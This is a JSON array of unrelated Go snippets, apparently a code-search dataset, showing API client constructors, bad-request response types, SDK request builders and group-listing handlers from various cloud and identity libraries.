[ "func NewListServerGroupBadRequest() *ListServerGroupBadRequest {\n\treturn &ListServerGroupBadRequest{}\n}", "func NewGetConsistencyGroupsBadRequest() *GetConsistencyGroupsBadRequest {\n\treturn &GetConsistencyGroupsBadRequest{}\n}", "func NewGetHostGroupsBadRequest() *GetHostGroupsBadRequest {\n\treturn &GetHostGroupsBadRequest{}\n}", "func NewUserGroupListBadRequest() *UserGroupListBadRequest {\n\treturn &UserGroupListBadRequest{}\n}", "func NewListGroupsNotFound() *ListGroupsNotFound {\n\treturn &ListGroupsNotFound{}\n}", "func NewListGroupsDefault(code int) *ListGroupsDefault {\n\treturn &ListGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewGetUsergroupsGroupIDBadRequest() *GetUsergroupsGroupIDBadRequest {\n\treturn &GetUsergroupsGroupIDBadRequest{}\n}", "func NewUpdateHostGroupsBadRequest() *UpdateHostGroupsBadRequest {\n\treturn &UpdateHostGroupsBadRequest{}\n}", "func NewGetAviServiceEngineGroupsBadRequest() *GetAviServiceEngineGroupsBadRequest {\n\n\treturn &GetAviServiceEngineGroupsBadRequest{}\n}", "func NewUpdateUserGroupsBadRequest() *UpdateUserGroupsBadRequest {\n\treturn &UpdateUserGroupsBadRequest{}\n}", "func NewListBadRequest(body *ListBadRequestResponseBody) *goa.ServiceError {\n\tv := &goa.ServiceError{\n\t\tName: *body.Name,\n\t\tID: *body.ID,\n\t\tMessage: *body.Message,\n\t\tTemporary: *body.Temporary,\n\t\tTimeout: *body.Timeout,\n\t\tFault: *body.Fault,\n\t}\n\n\treturn v\n}", "func TestGroupDataSource_DoesNotSwallowListGroupError(t *testing.T) {\n\tctrl := gomock.NewController(t)\n\tdefer ctrl.Finish()\n\n\tprojectID := uuid.New()\n\tresourceData := createResourceData(t, projectID.String(), \"group-name\")\n\n\tgraphClient := azdosdkmocks.NewMockGraphClient(ctrl)\n\tclients := &client.AggregatedClient{GraphClient: graphClient, Ctx: context.Background()}\n\n\texpectedProjectDescriptorLookupArgs := graph.GetDescriptorArgs{StorageKey: &projectID}\n\tprojectDescriptor := converter.String(\"descriptor\")\n\tprojectDescriptorResponse := graph.GraphDescriptorResult{Value: projectDescriptor}\n\tgraphClient.\n\t\tEXPECT().\n\t\tGetDescriptor(clients.Ctx, expectedProjectDescriptorLookupArgs).\n\t\tReturn(&projectDescriptorResponse, nil)\n\n\texpectedListGroupArgs := graph.ListGroupsArgs{ScopeDescriptor: projectDescriptor}\n\tgraphClient.\n\t\tEXPECT().\n\t\tListGroups(clients.Ctx, expectedListGroupArgs).\n\t\tReturn(nil, errors.New(\"ListGroups() Failed\"))\n\n\terr := dataSourceGroupRead(resourceData, clients)\n\trequire.Contains(t, err.Error(), \"ListGroups() Failed\")\n}", "func NewGroupDeletesBadRequest() *GroupDeletesBadRequest {\n\treturn &GroupDeletesBadRequest{}\n}", "func NewQueryUserGroupsBadRequest() *QueryUserGroupsBadRequest {\n\treturn &QueryUserGroupsBadRequest{}\n}", "func NewDeleteUserGroupsBadRequest() *DeleteUserGroupsBadRequest {\n\treturn &DeleteUserGroupsBadRequest{}\n}", "func NewSetRoleGroupsBadRequest() *SetRoleGroupsBadRequest {\n\treturn &SetRoleGroupsBadRequest{}\n}", "func NewGetCustomerGroupsBadRequest() *GetCustomerGroupsBadRequest {\n\treturn &GetCustomerGroupsBadRequest{}\n}", "func (o *ListServerGroupBadRequest) Code() int {\n\treturn 400\n}", "func getGroups(w http.ResponseWriter, r *http.Request) {\n InitResponse(&w)\n if r.Method == \"OPTIONS\" {return}\n\n allow, _ := HasPermission(&w, r, CoreGroupModuleID, CoreAccessRead)\n if !allow {\n w.WriteHeader(http.StatusUnauthorized)\n json.NewEncoder(w).Encode(&CoreMessage{\n Message: \"Not authorized!\",\n })\n return\n }\n\n groups := []CoreGroup{}\n\n err := Db.Model(&groups).Select()\n if err != nil {\n w.WriteHeader(http.StatusBadRequest)\n return\n }\n\n w.WriteHeader(http.StatusOK)\n json.NewEncoder(w).Encode(groups)\n}", "func NewDeleteCIDGroupsBadRequest() *DeleteCIDGroupsBadRequest {\n\treturn &DeleteCIDGroupsBadRequest{}\n}", "func NewCreateConsistencyGroupBadRequest() *CreateConsistencyGroupBadRequest {\n\treturn &CreateConsistencyGroupBadRequest{}\n}", "func (client IdentityClient) ListGroups(ctx context.Context, request ListGroupsRequest) (response ListGroupsResponse, err error) {\n\tvar ociResponse common.OCIResponse\n\tpolicy := common.NoRetryPolicy()\n\tif client.RetryPolicy() != nil {\n\t\tpolicy = *client.RetryPolicy()\n\t}\n\tif request.RetryPolicy() != nil {\n\t\tpolicy = *request.RetryPolicy()\n\t}\n\tociResponse, err = common.Retry(ctx, request, client.listGroups, policy)\n\tif err != nil {\n\t\tif ociResponse != nil {\n\t\t\tif httpResponse := ociResponse.HTTPResponse(); httpResponse != nil {\n\t\t\t\topcRequestId := httpResponse.Header.Get(\"opc-request-id\")\n\t\t\t\tresponse = ListGroupsResponse{RawResponse: httpResponse, OpcRequestId: &opcRequestId}\n\t\t\t} else {\n\t\t\t\tresponse = ListGroupsResponse{}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\tif convertedResponse, ok := ociResponse.(ListGroupsResponse); ok {\n\t\tresponse = convertedResponse\n\t} else {\n\t\terr = fmt.Errorf(\"failed to convert OCIResponse into ListGroupsResponse\")\n\t}\n\treturn\n}", "func NewListGroupsForbidden() *ListGroupsForbidden {\n\treturn &ListGroupsForbidden{}\n}", "func NewUpdateHostGroupsDefault(code int) *UpdateHostGroupsDefault {\n\treturn &UpdateHostGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewPatchApi24ProtectionGroupsBadRequest() *PatchApi24ProtectionGroupsBadRequest {\n\treturn &PatchApi24ProtectionGroupsBadRequest{}\n}", "func NewGetHostGroupsDefault(code int) *GetHostGroupsDefault {\n\treturn &GetHostGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewGetGroupMembersListV1BadRequest() *GetGroupMembersListV1BadRequest {\n\treturn &GetGroupMembersListV1BadRequest{}\n}", "func NewPostVolumeGroupsListDefault(code int) *PostVolumeGroupsListDefault {\n\treturn &PostVolumeGroupsListDefault{\n\t\t_statusCode: code,\n\t}\n}", "func NewPostApi24HostsProtectionGroupsBadRequest() *PostApi24HostsProtectionGroupsBadRequest {\n\treturn &PostApi24HostsProtectionGroupsBadRequest{}\n}", "func NewListGroupsOK() *ListGroupsOK {\n\treturn &ListGroupsOK{}\n}", "func (o *UpdateUserGroupsBadRequest) Code() int {\n\treturn 400\n}", "func (client *Client) ListResourceGroupsWithOptions(request *ListResourceGroupsRequest, runtime *util.RuntimeOptions) (_result *ListResourceGroupsResponse, _err error) {\n\t_err = util.ValidateModel(request)\n\tif _err != nil {\n\t\treturn _result, _err\n\t}\n\tquery := map[string]interface{}{}\n\tif !tea.BoolValue(util.IsUnset(request.DisplayName)) {\n\t\tquery[\"DisplayName\"] = request.DisplayName\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.IncludeTags)) {\n\t\tquery[\"IncludeTags\"] = request.IncludeTags\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.Name)) {\n\t\tquery[\"Name\"] = request.Name\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.PageNumber)) {\n\t\tquery[\"PageNumber\"] = request.PageNumber\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.PageSize)) {\n\t\tquery[\"PageSize\"] = request.PageSize\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.ResourceGroupId)) {\n\t\tquery[\"ResourceGroupId\"] = request.ResourceGroupId\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.ResourceGroupIds)) {\n\t\tquery[\"ResourceGroupIds\"] = request.ResourceGroupIds\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.Status)) {\n\t\tquery[\"Status\"] = request.Status\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.Tag)) {\n\t\tquery[\"Tag\"] = request.Tag\n\t}\n\n\treq := &openapi.OpenApiRequest{\n\t\tQuery: openapiutil.Query(query),\n\t}\n\tparams := &openapi.Params{\n\t\tAction: tea.String(\"ListResourceGroups\"),\n\t\tVersion: tea.String(\"2020-03-31\"),\n\t\tProtocol: tea.String(\"HTTPS\"),\n\t\tPathname: tea.String(\"/\"),\n\t\tMethod: tea.String(\"POST\"),\n\t\tAuthType: tea.String(\"AK\"),\n\t\tStyle: tea.String(\"RPC\"),\n\t\tReqBodyType: tea.String(\"formData\"),\n\t\tBodyType: tea.String(\"json\"),\n\t}\n\t_result = &ListResourceGroupsResponse{}\n\t_body, _err := client.CallApi(params, req, runtime)\n\tif _err != nil {\n\t\treturn _result, _err\n\t}\n\t_err = tea.Convert(_body, &_result)\n\treturn _result, _err\n}", "func (c *DefaultIdentityProvider) ListGroups(ctx context.Context, options *metainternal.ListOptions) (*auth.GroupList, error) {\n\tkeyword := \"\"\n\tlimit := 50\n\tif options.FieldSelector != nil {\n\t\tkeyword, _ = options.FieldSelector.RequiresExactMatch(auth.KeywordQueryTag)\n\t\tlimitStr, _ := options.FieldSelector.RequiresExactMatch(auth.QueryLimitTag)\n\t\tif li, err := strconv.Atoi(limitStr); err == nil && li > 0 {\n\t\t\tlimit = li\n\t\t}\n\t}\n\n\t_, tenantID := authentication.GetUsernameAndTenantID(ctx)\n\tif tenantID != \"\" && tenantID != c.tenantID {\n\t\treturn nil, apierrors.NewBadRequest(\"must in the same tenant\")\n\t}\n\n\tallList, err := c.localGroupLister.List(labels.Everything())\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar localGroupList []*authv1.LocalGroup\n\tfor i, item := range allList {\n\t\tif item.Spec.TenantID == c.tenantID {\n\t\t\tlocalGroupList = append(localGroupList, allList[i])\n\t\t}\n\t}\n\n\tif keyword != \"\" {\n\t\tvar newList []*authv1.LocalGroup\n\t\tfor i, val := range localGroupList {\n\t\t\tif strings.Contains(val.Name, keyword) || strings.Contains(val.Spec.DisplayName, keyword) {\n\t\t\t\tnewList = append(newList, localGroupList[i])\n\t\t\t}\n\t\t}\n\t\tlocalGroupList = newList\n\t}\n\n\titems := localGroupList[0:min(len(localGroupList), limit)]\n\n\tgroupList := auth.GroupList{}\n\tfor _, item := range items {\n\t\tgroup := convertToGroup(item)\n\t\tgroupList.Items = append(groupList.Items, group)\n\t}\n\n\treturn &groupList, nil\n}", "func CreateListServerGroupsRequest() (request *ListServerGroupsRequest) {\n\trequest = &ListServerGroupsRequest{\n\t\tRpcRequest: &requests.RpcRequest{},\n\t}\n\trequest.InitWithApiInfo(\"Alb\", \"2020-06-16\", \"ListServerGroups\", \"alb\", \"openAPI\")\n\trequest.Method = requests.POST\n\treturn\n}", "func (a *HyperflexApiService) GetHyperflexInitiatorGroupList(ctx context.Context) ApiGetHyperflexInitiatorGroupListRequest {\n\treturn ApiGetHyperflexInitiatorGroupListRequest{\n\t\tApiService: a,\n\t\tctx: ctx,\n\t}\n}", "func (c *GroupController) List(ctx *app.ListGroupContext) error {\n\t// GroupController_List: start_implement\n\n\tdataStore := &dal.DataStore{}\n\tdataStore.GetSession()\n\t// Close the session\n\tdefer dataStore.Close()\n\tdc := dal.NewDalGroup(dataStore)\n\n\tgroups, err := dc.FetchAll()\n\n\tif err != nil {\n\t\tctx.ResponseData.Service.LogError(\"InternalServerError\", \"req_id\", middleware.ContextRequestID(ctx), \"ctrl\", \"Group\", \"action\", \"List\", ctx.RequestData.Request.Method, ctx.RequestData.Request.URL, \"databaseError\", err.Error())\n\t\treturn ctx.InternalServerError()\n\t}\n\n\tres := make(app.GwentapiGroupCollection, len(*groups))\n\n\tlastModified := time.Time{}\n\tfor i, group := range *groups {\n\t\tg, _ := factory.CreateGroup(&group)\n\n\t\tif lastModified.Before(group.Last_Modified) {\n\t\t\tlastModified = group.Last_Modified\n\t\t}\n\n\t\tres[i] = g\n\t}\n\n\t// GroupController_List: end_implement\n\thelpers.LastModified(ctx.ResponseData, lastModified)\n\tif ctx.IfModifiedSince != nil {\n\t\tif !helpers.IsModified(*ctx.IfModifiedSince, lastModified) {\n\t\t\treturn ctx.NotModified()\n\t\t}\n\t}\n\treturn ctx.OK(res)\n}", "func NewPcloudPlacementgroupsGetallBadRequest() *PcloudPlacementgroupsGetallBadRequest {\n\treturn &PcloudPlacementgroupsGetallBadRequest{}\n}", "func NewGetGroupListPublicV1BadRequest() *GetGroupListPublicV1BadRequest {\n\treturn &GetGroupListPublicV1BadRequest{}\n}", "func (client *ContainerGroupsClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *ContainerGroupsClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerInstance/containerGroups\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2023-05-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func NewPcloudVolumegroupsGetBadRequest() *PcloudVolumegroupsGetBadRequest {\n\treturn &PcloudVolumegroupsGetBadRequest{}\n}", "func (rm *resourceManager) newListRequestPayload(\n\tr *resource,\n) (*svcsdk.DescribeReplicationGroupsInput, error) {\n\tres := &svcsdk.DescribeReplicationGroupsInput{}\n\n\tif r.ko.Spec.ReplicationGroupID != nil {\n\t\tres.SetReplicationGroupId(*r.ko.Spec.ReplicationGroupID)\n\t}\n\n\treturn res, nil\n}", "func (a *IAMApiService) GetGroups(ctx context.Context) (IamGroups, *http.Response, error) {\n\tvar (\n\t\tlocalVarHttpMethod = http.MethodGet\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue IamGroups\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/acs/api/v1/groups\"\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := url.Values{}\n\tlocalVarFormParams := url.Values{}\n\n\t// to determine the Content-Type header\n\tlocalVarHttpContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHttpContentType := selectHeaderContentType(localVarHttpContentTypes)\n\tif localVarHttpContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHttpContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHttpHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHttpHeaderAccept := selectHeaderAccept(localVarHttpHeaderAccepts)\n\tif localVarHttpHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHttpHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHttpMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHttpResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHttpResponse == nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tlocalVarBody, err := ioutil.ReadAll(localVarHttpResponse.Body)\n\tlocalVarHttpResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tif localVarHttpResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHttpResponse.Status,\n\t\t}\n\t\tif localVarHttpResponse.StatusCode == 200 {\n\t\t\tvar v IamGroups\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\t\tif localVarHttpResponse.StatusCode == 0 {\n\t\t\tvar v IamError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHttpResponse, nil\n}", "func NewListPermissionBadRequest() *ListPermissionBadRequest {\n\treturn &ListPermissionBadRequest{}\n}", "func NewAddEventLoopGroupBadRequest() *AddEventLoopGroupBadRequest {\n\treturn &AddEventLoopGroupBadRequest{}\n}", "func NewGroup(ctx context.Context) *errGroup {\n\tnewCtx, cancel := context.WithCancel(ctx)\n\treturn &errGroup{\n\t\tctx: newCtx,\n\t\tcancel: cancel,\n\t}\n}", "func NewDefaultGroups(ctx *pulumi.Context,\n\tname string, args *DefaultGroupsArgs, opts ...pulumi.ResourceOption) (*DefaultGroups, error) {\n\tif args == nil || args.GroupIds == nil {\n\t\treturn nil, errors.New(\"missing required argument 'GroupIds'\")\n\t}\n\tif args == nil || args.RealmId == nil {\n\t\treturn nil, errors.New(\"missing required argument 'RealmId'\")\n\t}\n\tif args == nil {\n\t\targs = &DefaultGroupsArgs{}\n\t}\n\tvar resource DefaultGroups\n\terr := ctx.RegisterResource(\"keycloak:index/defaultGroups:DefaultGroups\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (client WorkloadNetworksClient) ListVMGroupsPreparer(ctx context.Context, resourceGroupName string, privateCloudName string) (*http.Request, error) {\n\tpathParameters := map[string]interface{}{\n\t\t\"privateCloudName\": autorest.Encode(\"path\", privateCloudName),\n\t\t\"resourceGroupName\": autorest.Encode(\"path\", resourceGroupName),\n\t\t\"subscriptionId\": autorest.Encode(\"path\", client.SubscriptionID),\n\t}\n\n\tconst APIVersion = \"2020-07-17-preview\"\n\tqueryParameters := map[string]interface{}{\n\t\t\"api-version\": APIVersion,\n\t}\n\n\tpreparer := autorest.CreatePreparer(\n\t\tautorest.AsGet(),\n\t\tautorest.WithBaseURL(client.BaseURI),\n\t\tautorest.WithPathParameters(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AVS/privateClouds/{privateCloudName}/workloadNetworks/default/vmGroups\", pathParameters),\n\t\tautorest.WithQueryParameters(queryParameters))\n\treturn preparer.Prepare((&http.Request{}).WithContext(ctx))\n}", "func (client IdentityClient) ListDynamicGroups(ctx context.Context, request ListDynamicGroupsRequest) (response ListDynamicGroupsResponse, err error) {\n\tvar ociResponse common.OCIResponse\n\tpolicy := common.NoRetryPolicy()\n\tif client.RetryPolicy() != nil {\n\t\tpolicy = *client.RetryPolicy()\n\t}\n\tif request.RetryPolicy() != nil {\n\t\tpolicy = *request.RetryPolicy()\n\t}\n\tociResponse, err = common.Retry(ctx, request, client.listDynamicGroups, policy)\n\tif err != nil {\n\t\tif ociResponse != nil {\n\t\t\tif httpResponse := ociResponse.HTTPResponse(); httpResponse != nil {\n\t\t\t\topcRequestId := httpResponse.Header.Get(\"opc-request-id\")\n\t\t\t\tresponse = ListDynamicGroupsResponse{RawResponse: httpResponse, OpcRequestId: &opcRequestId}\n\t\t\t} else {\n\t\t\t\tresponse = ListDynamicGroupsResponse{}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\tif convertedResponse, ok := ociResponse.(ListDynamicGroupsResponse); ok {\n\t\tresponse = convertedResponse\n\t} else {\n\t\terr = fmt.Errorf(\"failed to convert OCIResponse into ListDynamicGroupsResponse\")\n\t}\n\treturn\n}", "func NewPcloudPlacementgroupsPostBadRequest() *PcloudPlacementgroupsPostBadRequest {\n\treturn &PcloudPlacementgroupsPostBadRequest{}\n}", "func NewObjectsListBadRequest() *ObjectsListBadRequest {\n\n\treturn &ObjectsListBadRequest{}\n}", "func validateGroups(groupID, totalGroupsNum uint) error {\n\tif totalGroupsNum == 0 {\n\t\t// Need at least one group\n\t\treturn fmt.Errorf(errTotalGroupsZero)\n\t}\n\tif groupID >= totalGroupsNum {\n\t\t// Need reasonable groupID\n\t\treturn fmt.Errorf(errInvalidGroupsFmt, groupID, totalGroupsNum)\n\t}\n\treturn nil\n}", "func CreateListExperimentGroupsRequest() (request *ListExperimentGroupsRequest) {\n\trequest = &ListExperimentGroupsRequest{\n\t\tRoaRequest: &requests.RoaRequest{},\n\t}\n\trequest.InitWithApiInfo(\"PaiRecService\", \"2022-12-13\", \"ListExperimentGroups\", \"/api/v1/experimentgroups\", \"\", \"\")\n\trequest.Method = requests.GET\n\treturn\n}", "func CreateListServerGroupsResponse() (response *ListServerGroupsResponse) {\n\tresponse = &ListServerGroupsResponse{\n\t\tBaseResponse: &responses.BaseResponse{},\n\t}\n\treturn\n}", "func (_e *MockQueryCoord_Expecter) ListResourceGroups(ctx interface{}, req interface{}) *MockQueryCoord_ListResourceGroups_Call {\n\treturn &MockQueryCoord_ListResourceGroups_Call{Call: _e.mock.On(\"ListResourceGroups\", ctx, req)}\n}", "func ValidateListBadRequestResponseBody(body *ListBadRequestResponseBody) (err error) {\n\tif body.Name == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"name\", \"body\"))\n\t}\n\tif body.ID == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"id\", \"body\"))\n\t}\n\tif body.Message == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"message\", \"body\"))\n\t}\n\tif body.Temporary == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"temporary\", \"body\"))\n\t}\n\tif body.Timeout == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"timeout\", \"body\"))\n\t}\n\tif body.Fault == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"fault\", \"body\"))\n\t}\n\treturn\n}", "func (m *GraphBaseServiceClient) Groups()(*ia6e876e3ed2d92c29c13dbc8c37513bc38d0d5f05ab9321e43a25ff336912a2d.GroupsRequestBuilder) {\n return ia6e876e3ed2d92c29c13dbc8c37513bc38d0d5f05ab9321e43a25ff336912a2d.NewGroupsRequestBuilderInternal(m.pathParameters, m.requestAdapter);\n}", "func (m *GraphBaseServiceClient) Groups()(*ia6e876e3ed2d92c29c13dbc8c37513bc38d0d5f05ab9321e43a25ff336912a2d.GroupsRequestBuilder) {\n return ia6e876e3ed2d92c29c13dbc8c37513bc38d0d5f05ab9321e43a25ff336912a2d.NewGroupsRequestBuilderInternal(m.pathParameters, m.requestAdapter);\n}", "func (client DataControllersClient) ListInGroupPreparer(ctx context.Context, resourceGroupName string) (*http.Request, error) {\n\tpathParameters := map[string]interface{}{\n\t\t\"resourceGroupName\": autorest.Encode(\"path\", resourceGroupName),\n\t\t\"subscriptionId\": autorest.Encode(\"path\", client.SubscriptionID),\n\t}\n\n\tconst APIVersion = \"2019-07-24-preview\"\n\tqueryParameters := map[string]interface{}{\n\t\t\"api-version\": APIVersion,\n\t}\n\n\tpreparer := autorest.CreatePreparer(\n\t\tautorest.AsGet(),\n\t\tautorest.WithBaseURL(client.BaseURI),\n\t\tautorest.WithPathParameters(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AzureData/dataControllers\", pathParameters),\n\t\tautorest.WithQueryParameters(queryParameters))\n\treturn preparer.Prepare((&http.Request{}).WithContext(ctx))\n}", "func (o *QueryGroupMembersBadRequest) Code() int {\n\treturn 400\n}", "func NewGetIPAMvrfgroupBadRequest() *GetIPAMvrfgroupBadRequest {\n\treturn &GetIPAMvrfgroupBadRequest{}\n}", "func (a *Client) PublicListReasonGroups(params *PublicListReasonGroupsParams, authInfo runtime.ClientAuthInfoWriter) (*PublicListReasonGroupsOK, *PublicListReasonGroupsInternalServerError, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewPublicListReasonGroupsParams()\n\t}\n\n\tif params.Context == nil {\n\t\tparams.Context = context.Background()\n\t}\n\n\tif params.RetryPolicy != nil {\n\t\tparams.SetHTTPClientTransport(params.RetryPolicy)\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"publicListReasonGroups\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/reporting/v1/public/namespaces/{namespace}/reasonGroups\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &PublicListReasonGroupsReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tswitch v := result.(type) {\n\n\tcase *PublicListReasonGroupsOK:\n\t\treturn v, nil, nil\n\n\tcase *PublicListReasonGroupsInternalServerError:\n\t\treturn nil, v, nil\n\n\tdefault:\n\t\treturn nil, nil, fmt.Errorf(\"Unexpected Type %v\", reflect.TypeOf(v))\n\t}\n}", "func (o *ListGroupsDefault) Code() int {\n\treturn o._statusCode\n}", "func (client *ClustersClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *ClustersClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DBforPostgreSQL/serverGroupsv2\"\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2022-11-08\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func (o *RemoveServerGroupBadRequest) Code() int {\n\treturn 400\n}", "func handleGetGroups(c *Context, w http.ResponseWriter, r *http.Request) {\n\tpaging, err := parsePaging(r.URL)\n\tif err != nil {\n\t\tc.Logger.WithError(err).Error(\"failed to parse paging parameters\")\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\treturn\n\t}\n\n\twithInstallationCount, err := parseBool(r.URL, model.ShowInstallationCountQueryParameter, false)\n\tif err != nil {\n\t\tc.Logger.WithError(err).Error(\"failed to parse request parameters\")\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tfilter := &model.GroupFilter{\n\t\tPaging: paging,\n\t\tWithInstallationCount: withInstallationCount,\n\t}\n\n\tgroups, err := c.Store.GetGroupDTOs(filter)\n\tif err != nil {\n\t\tc.Logger.WithError(err).Error(\"failed to query groups\")\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn\n\t}\n\tif groups == nil {\n\t\tgroups = []*model.GroupDTO{}\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusOK)\n\toutputJSON(c, w, groups)\n}", "func NewAllDashboardsBadRequest() *AllDashboardsBadRequest {\n return &AllDashboardsBadRequest{\n }\n}", "func NewListIdpGroupMappingsBadRequest() *ListIdpGroupMappingsBadRequest {\n\treturn &ListIdpGroupMappingsBadRequest{}\n}", "func (ctx *ListMessageContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (ggSession *GreengrassSession) ListGroup(name string) error {\n\tvar id string\n\n\tif name != \"\" {\n\t\tlistOutput, err := ggSession.greengrass.ListGroups(&greengrass.ListGroupsInput{})\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tfor _, v := range listOutput.Groups {\n\t\t\tif name == *v.Name {\n\t\t\t\tid = *v.Id\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif id == \"\" {\n\t\t\treturn fmt.Errorf(\"group %s not found\", name)\n\t\t}\n\t} else {\n\t\tid = ggSession.config.Group.ID\n\t}\n\n\tgroup, err := 